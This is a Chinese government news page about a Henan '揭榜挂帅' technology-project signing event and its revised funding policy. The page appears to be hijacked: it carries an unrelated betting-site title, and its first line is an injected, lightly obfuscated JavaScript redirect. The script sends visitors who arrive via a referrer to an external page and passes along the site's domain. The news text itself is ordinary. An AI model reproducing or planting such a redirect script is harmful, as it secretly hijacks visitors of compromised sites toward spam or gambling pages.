var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

中国竞彩网

图片

当前位置:首页 工作动态

重大关键技术需求“揭榜挂帅”专场成功举办


发布日期:2021-10-24 08:58来源:资源配置与管理处 阅读次数:

  10月23日上午,重大关键技术需求“揭榜挂帅”专场活动在郑州成功举办。河南省人民政府副省长霍金花出席活动并致辞。该专场是第二届中国·河南开放创新暨跨国技术转移大会的重要专场活动之一。19项“揭榜挂帅”科技项目发榜方和揭榜方代表在现场成功签约。来自国内外知名科研院所、高等院校、企业的代表,共80余人现场参加活动。

  本次“揭榜挂帅”项目在2019年实施第一批项目的基础上,对原有的政策进行了较大的改进和提升,突出体现了“增、降、提、拆、保”五个特点。一是增设项目类别,新增面向国内外科研主体征集的成果转化类项目,从技术需求、成果转化两个方面双向发力,补长创新发展短板。二是降低入围要求,对项目合同额的要求从不低于1000万元调整为技术需求类不低于500万元、成果转化类不低于300万元,扩大支持范围,充分激发各类创新主体积极性。三是提升支持力度,省财政资金支持比例由原来合同额的20%提高到30%,上不封顶;同时,中榜项目优先向“科技贷”专业机构、科创类政府投资基金推荐,引导社会资本联动加大支持。四是拆除揭榜限制,不设置“身份”“牌子”“帽子”类门槛,体现“英雄不问出处,谁有本事谁揭榜”的创新导向,全面激发科研人员创新创造活力。五是设立揭榜险种,因不可抗力导致项目失败的,对投保企业给予30%的保费补贴,为研发攻关可能遇到的风险进行托底保障。